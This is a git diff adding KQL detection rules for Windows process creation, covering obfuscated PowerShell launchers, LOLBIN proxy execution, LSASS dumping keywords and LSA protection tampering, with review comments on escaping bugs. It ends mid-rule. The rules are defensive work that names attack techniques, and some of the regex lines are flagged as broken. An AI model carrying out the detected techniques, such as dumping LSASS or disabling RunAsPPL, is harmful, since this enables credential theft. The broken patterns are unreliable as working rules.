+// Description: Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001
+
+DeviceProcessEvents
+| where ProcessCommandLine matches regex "\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[" or ProcessCommandLine matches regex "\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[" or ProcessCommandLine matches regex "\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[" or ProcessCommandLine matches regex "\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}" or ProcessCommandLine matches regex "\\*mdr\\*\\W\\s*\\)\\.Name" or ProcessCommandLine matches regex "\\$VerbosePreference\\.ToString\\(" or ProcessCommandLine matches regex "\\[String\\]\\s*\\$VerbosePreference"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/invoke_obfuscation_stdin_launcher.kql b/KQL/rules/windows/process_creation/invoke_obfuscation_stdin_launcher.kql
new file mode 100644
index 00000000..f757d6cc
--- /dev/null
+++ b/KQL/rules/windows/process_creation/invoke_obfuscation_stdin_launcher.kql
@@ -0,0 +1,10 @@
+// Title: Invoke-Obfuscation STDIN+ Launcher
+// Author: Jonathan Cheong, oscd.community
+// Date: 2020-10-15
+// Level: high
+// Description: Detects Obfuscated use of stdin to execute PowerShell
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001
+
+DeviceProcessEvents
+| where ProcessCommandLine matches regex "cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$\\{?input\\}?|noexit).+\\""
\ No newline at end of file
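Review bot: The seven `matches regex` alternatives in the `| where` line of invoke_obfuscation_obfuscated_iex_invocation.kql are case-sensitive, unlike the case-insensitive `contains`, `endswith` and `=~` operators every other rule in this set relies on, so `$PSHome`, `$ShellId`, `$env:Public` and `$VerbosePreference` are only matched in the exact casing written here even though PowerShell identifiers are not case-sensitive. The via_stdin and via_use_clip rules in this same commit already carry an inline `(?i)`, so the converter could emit the same prefix for these patterns, e.g. `ProcessCommandLine matches regex "(?i)\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\["`. If the upstream Sigma rule is deliberately case-sensitive and the converter must stay faithful to it, a header comment such as `// Note: regex matching is case-sensitive; mirrors the upstream rule` would spare the next reader the same question.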
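Review bot: The regex literal in the `| where` line of invoke_obfuscation_stdin_launcher.kql ends in `.+\\""`, which inside a Kusto double-quoted string is an escaped backslash followed by the closing quote, leaving a stray `"` behind and a pattern that ends in a bare backslash, so the rule will not parse. The intended last character is presumably the literal quote from the upstream Sigma regex, which in KQL is written `\"`, so the line should end `.+\""`. The same escaping appears in invoke_obfuscation_var_launcher.kql, where `\\"set` terminates the string right after `(?:\\s|)` and `\\\\\\"` and the final `\\""` have the same problem, and in invoke_obfuscation_via_stdin.kql, whose pattern ends `.*""` with an unescaped inner quote. It looks like the converter escapes `"` to `\"` and then escapes that backslash a second time; since these files are generated, the fix belongs in the converter's string-escaping step, with a regression test over a Sigma regex containing `"`, `\"` and `\\"`.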
diff --git a/KQL/rules/windows/process_creation/invoke_obfuscation_var_launcher.kql b/KQL/rules/windows/process_creation/invoke_obfuscation_var_launcher.kql
new file mode 100644
index 00000000..21843273
--- /dev/null
+++ b/KQL/rules/windows/process_creation/invoke_obfuscation_var_launcher.kql
@@ -0,0 +1,10 @@
+// Title: Invoke-Obfuscation VAR+ Launcher
+// Author: Jonathan Cheong, oscd.community
+// Date: 2020-10-15
+// Level: high
+// Description: Detects Obfuscated use of Environment Variables to execute PowerShell
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001
+
+DeviceProcessEvents
+| where ProcessCommandLine matches regex "cmd.{0,5}(?:/c|/r)(?:\\s|)\\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\\"\\s+?\\-f(?:.*\\)){1,}.*\\""
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/invoke_obfuscation_var_launcher_obfuscation.kql b/KQL/rules/windows/process_creation/invoke_obfuscation_var_launcher_obfuscation.kql
new file mode 100644
index 00000000..2a825bce
--- /dev/null
+++ b/KQL/rules/windows/process_creation/invoke_obfuscation_var_launcher_obfuscation.kql
@@ -0,0 +1,10 @@
+// Title: Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION
+// Author: Timur Zinniatullin, oscd.community
+// Date: 2020-10-13
+// Level: high
+// Description: Detects Obfuscated Powershell via VAR++ LAUNCHER
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "{0}" or ProcessCommandLine contains "{1}" or ProcessCommandLine contains "{2}" or ProcessCommandLine contains "{3}" or ProcessCommandLine contains "{4}" or ProcessCommandLine contains "{5}") and (ProcessCommandLine contains "&&set" and ProcessCommandLine contains "cmd" and ProcessCommandLine contains "/c" and ProcessCommandLine contains "-f")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/invoke_obfuscation_via_stdin.kql b/KQL/rules/windows/process_creation/invoke_obfuscation_via_stdin.kql
new file mode 100644
index 00000000..f7ba515b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/invoke_obfuscation_via_stdin.kql
@@ -0,0 +1,10 @@
+// Title: Invoke-Obfuscation Via Stdin
+// Author: Nikita Nazarov, oscd.community
+// Date: 2020-10-12
+// Level: high
+// Description: Detects Obfuscated Powershell via Stdin in Scripts
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001
+
+DeviceProcessEvents
+| where ProcessCommandLine matches regex "(?i)(set).*&&\\s?set.*(environment|invoke|\\$\\{?input).*&&.*""
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/invoke_obfuscation_via_use_clip.kql b/KQL/rules/windows/process_creation/invoke_obfuscation_via_use_clip.kql
new file mode 100644
index 00000000..c7f60be2
--- /dev/null
+++ b/KQL/rules/windows/process_creation/invoke_obfuscation_via_use_clip.kql
@@ -0,0 +1,10 @@
+// Title: Invoke-Obfuscation Via Use Clip
+// Author: Nikita Nazarov, oscd.community
+// Date: 2020-10-09
+// Level: high
+// Description: Detects Obfuscated Powershell via use Clip.exe in Scripts
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001
+
+DeviceProcessEvents
+| where ProcessCommandLine matches regex "(?i)echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?)"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/invoke_obfuscation_via_use_mshta.kql b/KQL/rules/windows/process_creation/invoke_obfuscation_via_use_mshta.kql
new file mode 100644
index 00000000..230a5c07
--- /dev/null
+++ b/KQL/rules/windows/process_creation/invoke_obfuscation_via_use_mshta.kql
@@ -0,0 +1,10 @@
+// Title: Invoke-Obfuscation Via Use MSHTA
+// Author: Nikita Nazarov, oscd.community
+// Date: 2020-10-08
+// Level: high
+// Description: Detects Obfuscated Powershell via use MSHTA in Scripts
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "set" and ProcessCommandLine contains "&&" and ProcessCommandLine contains "mshta" and ProcessCommandLine contains "vbscript:createobject" and ProcessCommandLine contains ".run" and ProcessCommandLine contains "(window.close)"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/java_running_with_remote_debugging.kql b/KQL/rules/windows/process_creation/java_running_with_remote_debugging.kql
new file mode 100644
index 00000000..adc88d42
--- /dev/null
+++ b/KQL/rules/windows/process_creation/java_running_with_remote_debugging.kql
@@ -0,0 +1,10 @@
+// Title: Java Running with Remote Debugging
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-01-16
+// Level: medium
+// Description: Detects a JAVA process running with remote debugging allowing more than just localhost to connect
+// MITRE Tactic: Execution
+// Tags: attack.t1203, attack.execution
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "transport=dt_socket,address=" and (ProcessCommandLine contains "jre1." or ProcessCommandLine contains "jdk1.")) and (not((ProcessCommandLine contains "address=127.0.0.1" or ProcessCommandLine contains "address=localhost")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/jscript_compiler_execution.kql b/KQL/rules/windows/process_creation/jscript_compiler_execution.kql
new file mode 100644
index 00000000..a8c1cf13
--- /dev/null
+++ b/KQL/rules/windows/process_creation/jscript_compiler_execution.kql
@@ -0,0 +1,13 @@
+// Title: JScript Compiler Execution
+// Author: frack113
+// Date: 2022-05-02
+// Level: low
+// Description: Detects the execution of the "jsc.exe" (JScript Compiler).
+// Attacker might abuse this in order to compile JScript files on the fly and bypassing application whitelisting.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1127
+// False Positives:
+// - Legitimate use to compile JScript by developers.
+
+DeviceProcessEvents
+| where FolderPath endswith "\\jsc.exe" or ProcessVersionInfoOriginalFileName =~ "jsc.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/kavremover_dropped_binary_lolbin_usage.kql b/KQL/rules/windows/process_creation/kavremover_dropped_binary_lolbin_usage.kql
new file mode 100644
index 00000000..90e5378a
--- /dev/null
+++ b/KQL/rules/windows/process_creation/kavremover_dropped_binary_lolbin_usage.kql
@@ -0,0 +1,10 @@
+// Title: Kavremover Dropped Binary LOLBIN Usage
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-11-01
+// Level: high
+// Description: Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1127
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " run run-cmd " and (not((InitiatingProcessFolderPath endswith "\\cleanapi.exe" or InitiatingProcessFolderPath endswith "\\kavremover.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/kernel_memory_dump_via_livekd.kql b/KQL/rules/windows/process_creation/kernel_memory_dump_via_livekd.kql
new file mode 100644
index 00000000..60eb710d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/kernel_memory_dump_via_livekd.kql
@@ -0,0 +1,12 @@
+// Title: Kernel Memory Dump Via LiveKD
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-16
+// Level: high
+// Description: Detects execution of LiveKD with the "-m" flag to potentially dump the kernel memory
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+// - Unlikely in production environment
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -m" or ProcessCommandLine contains " /m" or ProcessCommandLine contains " –m" or ProcessCommandLine contains " —m" or ProcessCommandLine contains " ―m") and ((FolderPath endswith "\\livekd.exe" or FolderPath endswith "\\livekd64.exe") or ProcessVersionInfoOriginalFileName =~ "livekd.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/launch_vsdevshell_ps1_proxy_execution.kql b/KQL/rules/windows/process_creation/launch_vsdevshell_ps1_proxy_execution.kql
new file mode 100644
index 00000000..09cd1468
--- /dev/null
+++ b/KQL/rules/windows/process_creation/launch_vsdevshell_ps1_proxy_execution.kql
@@ -0,0 +1,12 @@
+// Title: Launch-VsDevShell.PS1 Proxy Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-19
+// Level: medium
+// Description: Detects the use of the 'Launch-VsDevShell.ps1' Microsoft signed script to execute commands.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1216.001
+// False Positives:
+// - Legitimate usage of the script by a developer
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "VsWherePath " or ProcessCommandLine contains "VsInstallationPath ") and ProcessCommandLine contains "Launch-VsDevShell.ps1"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/loaded_module_enumeration_via_tasklist_exe.kql b/KQL/rules/windows/process_creation/loaded_module_enumeration_via_tasklist_exe.kql
new file mode 100644
index 00000000..3e0f8ef2
--- /dev/null
+++ b/KQL/rules/windows/process_creation/loaded_module_enumeration_via_tasklist_exe.kql
@@ -0,0 +1,12 @@
+// Title: Loaded Module Enumeration Via Tasklist.EXE
+// Author: Swachchhanda Shrawan Poudel
+// Date: 2024-02-12
+// Level: medium
+// Description: Detects the enumeration of a specific DLL or EXE being used by a binary via "tasklist.exe".
+// This is often used by attackers in order to find the specific process identifier (PID) that is using the DLL in question.
+// In order to dump the process memory or perform other nefarious actions.
+// MITRE Tactic: Credential Access
+// Tags: attack.t1003, attack.credential-access
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-m" or ProcessCommandLine contains "/m" or ProcessCommandLine contains "–m" or ProcessCommandLine contains "—m" or ProcessCommandLine contains "―m") and (FolderPath endswith "\\tasklist.exe" or ProcessVersionInfoOriginalFileName =~ "tasklist.exe") and ProcessCommandLine contains "rdpcorets.dll"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/local_accounts_discovery.kql b/KQL/rules/windows/process_creation/local_accounts_discovery.kql
new file mode 100644
index 00000000..fed49bcc
--- /dev/null
+++ b/KQL/rules/windows/process_creation/local_accounts_discovery.kql
@@ -0,0 +1,12 @@
+// Title: Local Accounts Discovery
+// Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community
+// Date: 2019-10-21
+// Level: low
+// Description: Local accounts, System Owner/User discovery using operating systems utilities
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1033, attack.t1087.001
+// False Positives:
+// - Legitimate administrator or user enumerates local users for legitimate reason
+
+DeviceProcessEvents
+| where (((ProcessCommandLine contains " /c" and ProcessCommandLine contains "dir " and ProcessCommandLine contains "\\Users\\") and FolderPath endswith "\\cmd.exe") and (not(ProcessCommandLine contains " rmdir "))) or ((ProcessCommandLine contains "user" and (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe")) and (not((ProcessCommandLine contains "/domain" or ProcessCommandLine contains "/add" or ProcessCommandLine contains "/delete" or ProcessCommandLine contains "/active" or ProcessCommandLine contains "/expires" or ProcessCommandLine contains "/passwordreq" or ProcessCommandLine contains "/scriptpath" or ProcessCommandLine contains "/times" or ProcessCommandLine contains "/workstations")))) or ((ProcessCommandLine contains " /l" and FolderPath endswith "\\cmdkey.exe") or ((FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\quser.exe" or FolderPath endswith "\\qwinsta.exe") or (ProcessVersionInfoOriginalFileName in~ ("whoami.exe", "quser.exe", "qwinsta.exe"))) or ((ProcessCommandLine contains "useraccount" and ProcessCommandLine contains "get") and FolderPath endswith "\\wmic.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/local_file_read_using_curl_exe.kql b/KQL/rules/windows/process_creation/local_file_read_using_curl_exe.kql
new file mode 100644
index 00000000..beab6efb
--- /dev/null
+++ b/KQL/rules/windows/process_creation/local_file_read_using_curl_exe.kql
@@ -0,0 +1,10 @@
+// Title: Local File Read Using Curl.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-07-27
+// Level: medium
+// Description: Detects execution of "curl.exe" with the "file://" protocol handler in order to read local files.
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "file:///" and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/local_groups_reconnaissance_via_wmic_exe.kql b/KQL/rules/windows/process_creation/local_groups_reconnaissance_via_wmic_exe.kql
new file mode 100644
index 00000000..f663ee48
--- /dev/null
+++ b/KQL/rules/windows/process_creation/local_groups_reconnaissance_via_wmic_exe.kql
@@ -0,0 +1,13 @@
+// Title: Local Groups Reconnaissance Via Wmic.EXE
+// Author: frack113
+// Date: 2021-12-12
+// Level: low
+// Description: Detects the execution of "wmic" with the "group" flag.
+// Adversaries may attempt to find local system groups and permission settings.
+// The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.
+// Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1069.001
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " group" and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/logged_on_user_password_change_via_ksetup_exe.kql b/KQL/rules/windows/process_creation/logged_on_user_password_change_via_ksetup_exe.kql
new file mode 100644
index 00000000..5349e8a2
--- /dev/null
+++ b/KQL/rules/windows/process_creation/logged_on_user_password_change_via_ksetup_exe.kql
@@ -0,0 +1,10 @@
+// Title: Logged-On User Password Change Via Ksetup.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-06
+// Level: medium
+// Description: Detects password change for the logged-on user's via "ksetup.exe"
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " /ChangePassword " and (FolderPath endswith "\\ksetup.exe" or ProcessVersionInfoOriginalFileName =~ "ksetup.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/lol_binary_copied_from_system_directory.kql b/KQL/rules/windows/process_creation/lol_binary_copied_from_system_directory.kql
new file mode 100644
index 00000000..cb596131
--- /dev/null
+++ b/KQL/rules/windows/process_creation/lol_binary_copied_from_system_directory.kql
@@ -0,0 +1,10 @@
+// Title: LOL-Binary Copied From System Directory
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-29
+// Level: high
+// Description: Detects a suspicious copy operation that tries to copy a known LOLBIN from system (System32, SysWOW64, WinSxS) directories to another on disk in order to bypass detections based on locations.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.003
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "copy " and FolderPath endswith "\\cmd.exe") or ((FolderPath endswith "\\robocopy.exe" or FolderPath endswith "\\xcopy.exe") or (ProcessVersionInfoOriginalFileName in~ ("robocopy.exe", "XCOPY.EXE"))) or ((ProcessCommandLine contains "copy-item" or ProcessCommandLine contains " copy " or ProcessCommandLine contains "cpi " or ProcessCommandLine contains " cp ") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe"))) and ((ProcessCommandLine contains "\\bitsadmin.exe" or ProcessCommandLine contains "\\calc.exe" or ProcessCommandLine contains "\\certutil.exe" or ProcessCommandLine contains "\\cmdl32.exe" or ProcessCommandLine contains "\\cscript.exe" or ProcessCommandLine contains "\\mshta.exe" or ProcessCommandLine contains "\\rundll32.exe" or ProcessCommandLine contains "\\wscript.exe" or ProcessCommandLine contains "\\ie4uinit.exe") and (ProcessCommandLine contains "\\System32" or ProcessCommandLine contains "\\SysWOW64" or ProcessCommandLine contains "\\WinSxS"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/lolbas_data_exfiltration_by_datasvcutil_exe.kql b/KQL/rules/windows/process_creation/lolbas_data_exfiltration_by_datasvcutil_exe.kql
new file mode 100644
index 00000000..aea9618f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/lolbas_data_exfiltration_by_datasvcutil_exe.kql
@@ -0,0 +1,14 @@
+// Title: LOLBAS Data Exfiltration by DataSvcUtil.exe
+// Author: Ialle Teixeira @teixeira0xfffff, Austin Songer @austinsonger
+// Date: 2021-09-30
+// Level: medium
+// Description: Detects when a user performs data exfiltration by using DataSvcUtil.exe
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.t1567
+// False Positives:
+// - DataSvcUtil.exe being used may be performed by a system administrator.
+// - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
+// - DataSvcUtil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/in:" or ProcessCommandLine contains "/out:" or ProcessCommandLine contains "/uri:") and (FolderPath endswith "\\DataSvcUtil.exe" or ProcessVersionInfoOriginalFileName =~ "DataSvcUtil.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/lolbin_runexehelper_use_as_proxy.kql b/KQL/rules/windows/process_creation/lolbin_runexehelper_use_as_proxy.kql
new file mode 100644
index 00000000..18e0d02a
--- /dev/null
+++ b/KQL/rules/windows/process_creation/lolbin_runexehelper_use_as_proxy.kql
@@ -0,0 +1,10 @@
+// Title: Lolbin Runexehelper Use As Proxy
+// Author: frack113
+// Date: 2022-12-29
+// Level: medium
+// Description: Detect usage of the "runexehelper.exe" binary as a proxy to launch other programs
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\runexehelper.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/lolbin_unregmp2_exe_use_as_proxy.kql b/KQL/rules/windows/process_creation/lolbin_unregmp2_exe_use_as_proxy.kql
new file mode 100644
index 00000000..4ebe6505
--- /dev/null
+++ b/KQL/rules/windows/process_creation/lolbin_unregmp2_exe_use_as_proxy.kql
@@ -0,0 +1,10 @@
+// Title: Lolbin Unregmp2.exe Use As Proxy
+// Author: frack113
+// Date: 2022-12-29
+// Level: medium
+// Description: Detect usage of the "unregmp2.exe" binary as a proxy to launch a custom version of "wmpnscfg.exe"
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -HideWMP" or ProcessCommandLine contains " /HideWMP" or ProcessCommandLine contains " –HideWMP" or ProcessCommandLine contains " —HideWMP" or ProcessCommandLine contains " ―HideWMP") and (FolderPath endswith "\\unregmp2.exe" or ProcessVersionInfoOriginalFileName =~ "unregmp2.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/lsa_ppl_protection_disabled_via_reg_exe.kql b/KQL/rules/windows/process_creation/lsa_ppl_protection_disabled_via_reg_exe.kql
new file mode 100644
index 00000000..601077fd
--- /dev/null
+++ b/KQL/rules/windows/process_creation/lsa_ppl_protection_disabled_via_reg_exe.kql
@@ -0,0 +1,12 @@
+// Title: LSA PPL Protection Disabled Via Reg.EXE
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-03-22
+// Level: high
+// Description: Detects the usage of the "reg.exe" utility to disable PPL protection on the LSA process
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.010
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "SYSTEM\\CurrentControlSet\\Control\\Lsa" and (ProcessCommandLine contains " add " and ProcessCommandLine contains " /d 0" and ProcessCommandLine contains " /v RunAsPPL ")) and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/lsass_dump_keyword_in_commandline.kql b/KQL/rules/windows/process_creation/lsass_dump_keyword_in_commandline.kql
new file mode 100644
index 00000000..43d11d20
--- /dev/null
+++ b/KQL/rules/windows/process_creation/lsass_dump_keyword_in_commandline.kql
@@ -0,0 +1,12 @@
+// Title: LSASS Dump Keyword In CommandLine
+// Author: E.M. Anhaus, Tony Lambert, oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-10-24
+// Level: high
+// Description: Detects the presence of the keywords "lsass" and ".dmp" in the commandline, which could indicate a potential attempt to dump or create a dump of the lsass process.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "lsass.dmp" or ProcessCommandLine contains "lsass.zip" or ProcessCommandLine contains "lsass.rar" or ProcessCommandLine contains "Andrew.dmp" or ProcessCommandLine contains "Coredump.dmp" or ProcessCommandLine contains "NotLSASS.zip" or ProcessCommandLine contains "lsass_2" or ProcessCommandLine contains "lsassdump" or ProcessCommandLine contains "lsassdmp") or (ProcessCommandLine contains "lsass" and ProcessCommandLine contains ".dmp") or (ProcessCommandLine contains "SQLDmpr" and ProcessCommandLine contains ".mdmp") or (ProcessCommandLine contains "nanodump" and ProcessCommandLine contains ".dmp")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/lsass_process_reconnaissance_via_findstr_exe.kql b/KQL/rules/windows/process_creation/lsass_process_reconnaissance_via_findstr_exe.kql
new file mode 100644
index 00000000..3ff548be
--- /dev/null
+++ b/KQL/rules/windows/process_creation/lsass_process_reconnaissance_via_findstr_exe.kql
@@ -0,0 +1,10 @@
+// Title: LSASS Process Reconnaissance Via Findstr.EXE
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-08-12
+// Level: high
+// Description: Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.006
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "lsass" and ((FolderPath endswith "\\find.exe" or FolderPath endswith "\\findstr.exe") or (ProcessVersionInfoOriginalFileName in~ ("FIND.EXE", "FINDSTR.EXE")))) or (ProcessCommandLine contains " -i \"lsass" or ProcessCommandLine contains " /i \"lsass" or ProcessCommandLine contains " –i \"lsass" or ProcessCommandLine contains " —i \"lsass" or ProcessCommandLine contains " ―i \"lsass" or ProcessCommandLine contains " -i lsass.exe" or ProcessCommandLine contains " /i lsass.exe" or ProcessCommandLine contains " –i lsass.exe" or ProcessCommandLine contains " —i lsass.exe" or ProcessCommandLine contains " ―i lsass.exe" or ProcessCommandLine contains "findstr \"lsass" or ProcessCommandLine contains "findstr lsass" or ProcessCommandLine contains "findstr.exe \"lsass" or ProcessCommandLine contains "findstr.exe lsass")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/malicious_base64_encoded_powershell_keywords_in_command_lines.kql b/KQL/rules/windows/process_creation/malicious_base64_encoded_powershell_keywords_in_command_lines.kql
new file mode 100644
index 00000000..faad903c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/malicious_base64_encoded_powershell_keywords_in_command_lines.kql
@@ -0,0 +1,10 @@
+// Title: Malicious Base64 Encoded PowerShell Keywords in Command Lines
+// Author: John Lambert (rule)
+// Date: 2019-01-16
+// Level: high
+// Description: Detects base64 encoded strings used in hidden malicious PowerShell command lines
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "AGkAdABzAGEAZABtAGkAbgAgAC8AdAByAGEAbgBzAGYAZQByA" or ProcessCommandLine contains "aXRzYWRtaW4gL3RyYW5zZmVy" or ProcessCommandLine contains "IAaQB0AHMAYQBkAG0AaQBuACAALwB0AHIAYQBuAHMAZgBlAHIA" or ProcessCommandLine contains "JpdHNhZG1pbiAvdHJhbnNmZX" or ProcessCommandLine contains "YgBpAHQAcwBhAGQAbQBpAG4AIAAvAHQAcgBhAG4AcwBmAGUAcg" or ProcessCommandLine contains "Yml0c2FkbWluIC90cmFuc2Zlc" or ProcessCommandLine contains "AGMAaAB1AG4AawBfAHMAaQB6AGUA" or ProcessCommandLine contains "JABjAGgAdQBuAGsAXwBzAGkAegBlA" or ProcessCommandLine contains "JGNodW5rX3Npem" or ProcessCommandLine contains "QAYwBoAHUAbgBrAF8AcwBpAHoAZQ" or ProcessCommandLine contains "RjaHVua19zaXpl" or ProcessCommandLine contains "Y2h1bmtfc2l6Z" or ProcessCommandLine contains "AE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4A" or ProcessCommandLine contains "kATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8Abg" or ProcessCommandLine contains "lPLkNvbXByZXNzaW9u" or ProcessCommandLine contains "SQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuA" or ProcessCommandLine contains "SU8uQ29tcHJlc3Npb2" or ProcessCommandLine contains "Ty5Db21wcmVzc2lvb" or ProcessCommandLine contains "AE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQ" or ProcessCommandLine contains "kATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtA" or ProcessCommandLine contains "lPLk1lbW9yeVN0cmVhb" or ProcessCommandLine contains "SQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0A" or ProcessCommandLine contains "SU8uTWVtb3J5U3RyZWFt" or ProcessCommandLine contains "Ty5NZW1vcnlTdHJlYW" or ProcessCommandLine contains "4ARwBlAHQAQwBoAHUAbgBrA" or ProcessCommandLine contains "5HZXRDaHVua" or ProcessCommandLine contains 
